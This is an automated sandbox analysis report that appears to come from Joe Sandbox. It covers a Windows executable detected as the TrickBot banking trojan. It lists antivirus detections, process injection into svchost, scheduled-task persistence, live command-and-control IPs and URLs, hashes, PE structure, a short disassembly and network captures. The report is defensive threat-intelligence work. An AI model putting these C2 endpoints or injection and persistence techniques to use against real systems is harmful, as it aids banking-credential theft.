      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592535 Sample: 55ryoipjfdr.exe Startdate: 16/01/2025 Architecture: WINDOWS Score: 100 32 169.239.129.42 ZAPPIE-HOST-ASZappieHostGB Seychelles 2->32 34 178.156.202.97 SERVIHOSTING-ASAireNetworksES Romania 2->34 36 18 other IPs or domains 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 7 other signatures 2->44 8 55ryoipjfdr.exe 3 2->8         started        12 44qxnhoiecq.exe 2->12         started        signatures3 process4 file5 22 C:\Users\user\AppData\...\44qxnhoiecq.exe, PE32 8->22 dropped 24 C:\Users\...\44qxnhoiecq.exe:Zone.Identifier, ASCII 8->24 dropped 46 Detected unpacking (changes PE section rights) 8->46 48 Detected unpacking (overwrites its own PE header) 8->48 14 44qxnhoiecq.exe 8->14         started        50 Hijacks the control flow in another process 12->50 52 Writes to foreign memory regions 12->52 54 Allocates memory in foreign processes 12->54 56 Injects a PE file into a foreign processes 12->56 17 svchost.exe 3 12->17         started        signatures6 process7 dnsIp8 58 Antivirus detection for dropped file 14->58 60 Multi AV Scanner detection for dropped file 14->60 62 Detected unpacking (changes PE section rights) 14->62 66 7 other signatures 14->66 20 svchost.exe 14->20         started        26 194.87.95.122, 443, 49715 MTW-ASRU Russian Federation 17->26 28 194.87.99.210, 443, 49713, 49714 MTW-ASRU Russian Federation 17->28 30 api.ipify.org 104.26.12.205, 49712, 80 CLOUDFLARENETUS United States 17->30 64 Detected Trickbot e-Banking trojan config 17->64 signatures9 process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      55ryoipjfdr.exe90%VirustotalBrowse
      55ryoipjfdr.exe95%ReversingLabsWin32.Ransomware.HydraCrypt
      55ryoipjfdr.exe100%AviraHEUR/AGEN.1315497
      55ryoipjfdr.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe100%AviraHEUR/AGEN.1315497
      C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe95%ReversingLabsWin32.Ransomware.HydraCrypt
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/0%Avira URL Cloudsafe
      https://194.87.95.122/0%Avira URL Cloudsafe
      https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/u0%Avira URL Cloudsafe
      https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/0%Avira URL Cloudsafe
      https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/0%Avira URL Cloudsafe
      https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/0%Avira URL Cloudsafe
      https://194.87.99.210/0%Avira URL Cloudsafe
      https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/H0%Avira URL Cloudsafe
      https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pD0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org
      104.26.12.205
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/true
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://194.87.95.122/svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/usvchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.99.210/svchost.exe, 00000008.00000002.2670888110.00000159F2AEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/Hsvchost.exe, 00000008.00000002.2670835827.00000159F2AB9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pDsvchost.exe, 00000008.00000002.2670621225.00000159F2A57000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        104.26.12.205
        api.ipify.orgUnited States
        13335CLOUDFLARENETUSfalse
        178.156.202.97
        unknownRomania
        29119SERVIHOSTING-ASAireNetworksEStrue
        194.87.99.62
        unknownRussian Federation
        48347MTW-ASRUtrue
        194.87.146.180
        unknownRussian Federation
        48347MTW-ASRUtrue
        194.87.111.6
        unknownRussian Federation
        48347MTW-ASRUtrue
        194.87.95.122
        unknownRussian Federation
        48347MTW-ASRUtrue
        147.135.196.128
        unknownFrance
        16276OVHFRtrue
        195.133.147.135
        unknownRussian Federation
        48347MTW-ASRUtrue
        195.133.197.187
        unknownRussian Federation
        48347MTW-ASRUtrue
        194.87.99.210
        unknownRussian Federation
        48347MTW-ASRUtrue
        185.15.245.102
        unknownGermany
        24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
        185.15.245.103
        unknownGermany
        24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
        194.87.95.120
        unknownRussian Federation
        48347MTW-ASRUtrue
        185.158.113.62
        unknownRussian Federation
        44812IPSERVER-RU-NETFiordRUtrue
        194.87.239.114
        unknownRussian Federation
        48347MTW-ASRUtrue
        195.133.48.80
        unknownRussian Federation
        48347MTW-ASRUtrue
        194.87.99.220
        unknownRussian Federation
        48347MTW-ASRUtrue
        169.239.129.42
        unknownSeychelles
        61138ZAPPIE-HOST-ASZappieHostGBtrue
        193.19.118.207
        unknownRussian Federation
        44812IPSERVER-RU-NETFiordRUtrue
        91.83.88.51
        unknownHungary
        12301INVITECHHUtrue
        199.48.160.60
        unknownUnited States
        19531NODESDIRECTUStrue
        94.242.224.218
        unknownLuxembourg
        5577ROOTLUtrue
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1592535
        Start date and time:2025-01-16 09:08:11 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 20s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:10
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:55ryoipjfdr.exe
        Detection:MAL
        Classification:mal100.bank.troj.evad.winEXE@8/4@1/22
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 82
        • Number of non-executed functions: 149
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded IPs from analysis (whitelisted): 4.175.87.197
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        TimeTypeDescription
        03:10:54API Interceptor1x Sleep call for process: svchost.exe modified
        09:10:20Task SchedulerRun new task: services update path: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        jgbC220X2U.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/?format=text
        xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
        • api.ipify.org/
        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
        • api.ipify.org/
        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
        • api.ipify.org/
        Simple2.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
        • api.ipify.org/
        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
        • api.ipify.org/
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        api.ipify.orghttp://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887Get hashmaliciousHTMLPhisherBrowse
        • 104.26.12.205
        https://cancelartransferenciaprogramadabdb.glitch.me/Get hashmaliciousUnknownBrowse
        • 104.26.12.205
        009.vbeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        https://adelademable.org/abujguyaleon.htmlGet hashmaliciousUnknownBrowse
        • 104.26.12.205
        0969686.vbeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        new order.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
        • 104.26.12.205
        http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
        • 104.26.12.205
        Employee_Salary_Update.docxGet hashmaliciousUnknownBrowse
        • 104.26.12.205
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSORDER-202577008.lnkGet hashmaliciousUnknownBrowse
        • 104.21.96.1
        INQUIRY LIST 292.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
        • 104.21.96.1
        Contrarre.scr.exeGet hashmaliciousMassLogger RATBrowse
        • 104.21.48.1
        PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
        • 104.21.80.1
        QT202515010642.JPG.PDF.vbsGet hashmaliciousUnknownBrowse
        • 104.17.151.117
        Personliche Nachricht fur Friedhelm Hanusch.pdfGet hashmaliciousUnknownBrowse
        • 104.18.94.41
        arm7.elfGet hashmaliciousUnknownBrowse
        • 1.12.192.222
        https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69Get hashmaliciousUnknownBrowse
        • 172.67.215.98
        https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1Get hashmaliciousUnknownBrowse
        • 104.21.63.154
        https://vyralink.emlnk.com/lt.php?x=3DZy~GE7IaWZ5XV7zAA9W.Zs~X7UvAL0v~hgXXLLJ3ag6X8v-Uy.xuG-142imNf#user_email=fiona.zhang@bbraun.com&fname=Zhang&lname=FionaGet hashmaliciousUnknownBrowse
        • 104.17.25.14
        SERVIHOSTING-ASAireNetworksESelitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
        • 178.156.215.19
        4.elfGet hashmaliciousUnknownBrowse
        • 185.27.124.167
        mpsl.elfGet hashmaliciousMiraiBrowse
        • 89.44.65.127
        Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
        • 213.170.233.169
        armv7l.elfGet hashmaliciousMiraiBrowse
        • 5.83.49.109
        Hilix.ppc.elfGet hashmaliciousMiraiBrowse
        • 185.132.166.222
        Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
        • 185.237.202.191
        Hilix.x86.elfGet hashmaliciousMiraiBrowse
        • 185.132.166.208
        nabm68k.elfGet hashmaliciousUnknownBrowse
        • 151.237.211.60
        splmpsl.elfGet hashmaliciousUnknownBrowse
        • 185.178.168.147
        MTW-ASRUbotx.m68k.elfGet hashmaliciousMiraiBrowse
        • 195.133.157.170
        8N8j6QojHn.dllGet hashmaliciousUnknownBrowse
        • 195.133.1.117
        8N8j6QojHn.dllGet hashmaliciousUnknownBrowse
        • 195.133.1.117
        ET5.exeGet hashmaliciousUnknownBrowse
        • 45.141.101.45
        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
        • 193.124.107.252
        na.elfGet hashmaliciousUnknownBrowse
        • 193.124.64.114
        la.bot.mips.elfGet hashmaliciousUnknownBrowse
        • 193.124.64.126
        g082Q9DajU.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog StealerBrowse
        • 195.133.48.136
        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
        • 195.133.48.136
        Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
        • 195.133.48.136
        No context
        No context
        Process:C:\Users\user\Desktop\55ryoipjfdr.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):396288
        Entropy (8bit):7.640880445990648
        Encrypted:false
        SSDEEP:6144:89FHululululululu4uOjzzUDjTgfH1okjroGWr2:89FHKKKKKKFzjzQJ5
        MD5:F0B9F50C6A247AC5CA9CC95135B83DCF
        SHA1:C1B276883DA10FA2BF1C37A3851781E5C702A601
        SHA-256:068AF8016C36FCE5CF1E1A4722C1DC0D6E02CB6ED58B61C2BA99A54D294CC274
        SHA-512:F02FCB14FFD9415281C4E2F916FB8A38E80BCD885A1EC6E07B73698C9878A8318E60092DA859818CDF49DE263F99F768684DA5ECEA669A9A2623A03A5D6DB1BB
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 95%
        Reputation:low
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.U.....................F...................@..........................@......h...........................................x....... ...............................................................................$............................text............................... ..`.rdata..l5.......6.................. ..@.data....y... ...z..................@....rsrc... ............v.................@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\55ryoipjfdr.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:true
        Reputation:high, very likely benign file
        Preview:[ZoneTransfer]....ZoneId=0
        Process:C:\Windows\System32\svchost.exe
        File Type:data
        Category:dropped
        Size (bytes):100
        Entropy (8bit):2.9436287058372557
        Encrypted:false
        SSDEEP:3:jlkvoOPPlllMH/KUnYR8H3TRlg4fn:jevoO10HLY61lgOn
        MD5:5490E48281541B751FBD683F84E39A7E
        SHA1:0BF2CC08C8411227DB415756ABB00E223CF151BB
        SHA-256:37191C2B65ED5E5C914C289CF8E7FF8330BD249F5E6B1A88DAD24F2348886D3C
        SHA-512:38CFA10E4880F601EBC52758DD656D3CE7B830463C6B1A8BE72E9C80D598EDAF358EE8F0C677C32E476517834643160E10634C207D588B0E40573B53E48DC490
        Malicious:false
        Reputation:low
        Preview:5.3.0.9.7.8._.W.1.0.0.1.9.0.4.5...D.A.5.B.5.3.9.6.6.F.E.F.B.7.4.C.8.9.8.3.6.3.C.3.E.E.6.1.8.E.B.5...
        Process:C:\Windows\System32\svchost.exe
        File Type:data
        Category:dropped
        Size (bytes):10
        Entropy (8bit):1.7709505944546688
        Encrypted:false
        SSDEEP:3:zl/:zl/
        MD5:9A878743FE56E3481D8D00A4DD43D2CB
        SHA1:E52D81B1838C735F0563ED631EDB19E95F542679
        SHA-256:B4B7C9157A3698AF44CF82CCB87D2A2BE658B18BE04B8051611144A908857927
        SHA-512:D4863D6C23D404B9C493EF75D8ED0B31969EC6BD24EDD377BA93F9AA2B30AE498B1BBDFDA3B41C2BCDC7238F7FA23CBBF9A4F29A4E4948A85D128EC9988249C2
        Malicious:false
        Reputation:low
        Preview:m.a.c.1...
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.640880445990648
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.94%
        • Win16/32 Executable Delphi generic (2074/23) 0.02%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • VXD Driver (31/22) 0.00%
        File name:55ryoipjfdr.exe
        File size:396'288 bytes
        MD5:f0b9f50c6a247ac5ca9cc95135b83dcf
        SHA1:c1b276883da10fa2bf1c37a3851781e5c702a601
        SHA256:068af8016c36fce5cf1e1a4722c1dc0d6e02cb6ed58b61c2ba99a54d294cc274
        SHA512:f02fcb14ffd9415281c4e2f916fb8a38e80bcd885a1ec6e07b73698c9878a8318e60092da859818cdf49de263f99f768684da5ecea669a9a2623a03a5d6db1bb
        SSDEEP:6144:89FHululululululu4uOjzzUDjTgfH1okjroGWr2:89FHKKKKKKFzjzQJ5
        TLSH:4F84D76A700ACB90DFC8D0FB2CD395F33A642363949B8E9C561D5F95BAE0DFC9960244
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.U.....................F....................@..........................@......h......................................
        Icon Hash:00928e8e8686b000
        Entrypoint:0x40a8d7
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:
        Time Stamp:0x55114F00 [Tue Mar 24 11:48:16 2015 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:e24946fd3b548d18411ea3dc85666a69
        Instruction
        push ebp
        push esp
        pop ebp
        lea esp, dword ptr [ebp-2Ch]
        lea ecx, dword ptr [00000049h]
        lea eax, dword ptr [00000008h]
        inc eax
        push eax
        push 0041297Dh
        push 0041296Bh
        call dword ptr [0040C808h]
        push 00412986h
        lea eax, dword ptr [FFFFFFFFh]
        inc eax
        push eax
        lea eax, dword ptr [000FFFFFh]
        inc eax
        push eax
        call dword ptr [0040C7D8h]
        test eax, eax
        jne 00007F80593139BFh
        push 00412986h
        lea eax, dword ptr [FFFFFFFFh]
        inc eax
        push eax
        lea eax, dword ptr [000FFFFFh]
        inc eax
        push eax
        call dword ptr [0040C7D8h]
        cmp eax, 00000000h
        jne 00007F805931399Bh
        lea eax, dword ptr [00000008h]
        inc eax
        push eax
        push 0041297Dh
        push 0041296Bh
        call dword ptr [0040C808h]
        push 00412986h
        lea eax, dword ptr [FFFFFFFFh]
        inc eax
        push eax
        lea eax, dword ptr [000FFFFFh]
        inc eax
        push eax
        call dword ptr [0040C7D8h]
        cmp eax, 00000000h
        jne 00007F805931395Fh
        push 0040738Fh
        ret
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        lea eax, dword ptr [00000008h]
        inc eax
        push eax
        push 0041297Dh
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0xe0000x78.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x49520.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf6d00x1e9c.rdata
        IMAGE_DIRECTORY_ENTRY_DEBUG0x12040x1c.text
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0xc71c0x124.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xc0c80xc200652b75188d378644e33c0f240ba7cdd0False0.14410840850515463data4.639698222820729IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0xe0000x356c0x36005887208e6d7eee01aed0c9730c63b618False0.5432581018518519data5.543532077797315IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .data0x120000x798f0x7a0018c3ed8d7ca1a47b64c23553968c7c51False0.1443391393442623data7.640824225225697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x1a0000x495200x496001e9722598152d22e71d517b382fa6c49False0.8315521188245315data7.813923857717711IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_DIALOG0x1a1200x3d200dataEnglishUnited States0.9962215618609407
        RT_DIALOG0x573200x4000dataEnglishUnited States0.00738525390625
        RT_DIALOG0x5b3200x4000dataEnglishUnited States0.00738525390625
        RT_DIALOG0x5f3200x4000dataEnglishUnited States0.00738525390625
        RT_DIALOG0x633200x200dataEnglishUnited States0.12109375
        DLLImport
        advapi32.dllRegEnumKeyW, OpenEventLogW, ClearEventLogA, LogonUserW, InitializeAcl, CryptSignHashW, RegOpenKeyA, ControlService, RegReplaceKeyA, RegSaveKeyA, RegCreateKeyExA, RegUnLoadKeyA
        authz.dllAuthzAddSidsToContext, AuthzInitializeContextFromSid
        shlwapi.dllUrlIsNoHistoryW, PathIsRootW, UrlGetLocationW, UrlCombineW, PathCommonPrefixA, UrlIsOpaqueW, PathCompactPathW, PathAppendA, PathCombineA, UrlCompareW, PathIsURLW, UrlIsA, UrlHashW, UrlGetPartW
        wtsapi32.dllWTSFreeMemory, WTSSetSessionInformationW, WTSVirtualChannelRead, WTSWaitSystemEvent, WTSRegisterSessionNotification, WTSQueryUserToken, WTSVirtualChannelPurgeInput, WTSQuerySessionInformationA, WTSSetUserConfigW, WTSEnumerateSessionsW, WTSEnumerateServersA
        kernel32.dllWaitForSingleObject, CreateJobObjectW, GetProcAddress, GetStringTypeW, OpenJobObjectW, InitializeCriticalSection, GetCommandLineW, MoveFileA, GetModuleHandleA, GetTempPathA, ReadConsoleA, GetProfileSectionA, GetSystemDirectoryA, CreateMailslotA, CreateFileW, GetLogicalDriveStringsA, GetModuleFileNameW, UnmapViewOfFile, GetDateFormatA, GetVersion, LoadLibraryExA, GetExpandedNameA, lstrcmpiA, DeleteFileW, SearchPathW, GetTickCount, GetFileAttributesW, MoveFileExA, GetConsoleAliasA
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-01-16T09:10:55.439247+01002838349ETPRO MALWARE Win32/TrickBot CnC Initial Checkin1192.168.2.849713194.87.99.210443TCP
        2025-01-16T09:10:56.730422+01002838349ETPRO MALWARE Win32/TrickBot CnC Initial Checkin1192.168.2.849714194.87.99.210443TCP
        TimestampSource PortDest PortSource IPDest IP
        Jan 16, 2025 09:10:53.645608902 CET4971280192.168.2.8104.26.12.205
        Jan 16, 2025 09:10:53.650430918 CET8049712104.26.12.205192.168.2.8
        Jan 16, 2025 09:10:53.650510073 CET4971280192.168.2.8104.26.12.205
        Jan 16, 2025 09:10:53.650801897 CET4971280192.168.2.8104.26.12.205
        Jan 16, 2025 09:10:53.655590057 CET8049712104.26.12.205192.168.2.8
        Jan 16, 2025 09:10:54.159845114 CET8049712104.26.12.205192.168.2.8
        Jan 16, 2025 09:10:54.209256887 CET4971280192.168.2.8104.26.12.205
        Jan 16, 2025 09:10:54.265755892 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:54.265813112 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:54.266088963 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:54.267465115 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:54.267484903 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.102375031 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.102447987 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.106292963 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.106322050 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.106549025 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.136301994 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.179358959 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.439097881 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.439146042 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.439194918 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.553175926 CET49713443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.553255081 CET44349713194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.554389954 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.554425955 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:55.554774046 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.554894924 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:55.554903984 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.393158913 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.394299984 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:56.394324064 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.394807100 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:56.394812107 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.730360985 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.730442047 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.730519056 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:56.731654882 CET49714443192.168.2.8194.87.99.210
        Jan 16, 2025 09:10:56.731667042 CET44349714194.87.99.210192.168.2.8
        Jan 16, 2025 09:10:56.732568026 CET49715443192.168.2.8194.87.95.122
        Jan 16, 2025 09:10:56.732675076 CET44349715194.87.95.122192.168.2.8
        Jan 16, 2025 09:10:56.732928991 CET49715443192.168.2.8194.87.95.122
        Jan 16, 2025 09:10:56.733190060 CET49715443192.168.2.8194.87.95.122
        Jan 16, 2025 09:10:56.733226061 CET44349715194.87.95.122192.168.2.8
        TimestampSource PortDest PortSource IPDest IP
        Jan 16, 2025 09:10:53.632669926 CET5602853192.168.2.81.1.1.1
        Jan 16, 2025 09:10:53.640288115 CET53560281.1.1.1192.168.2.8
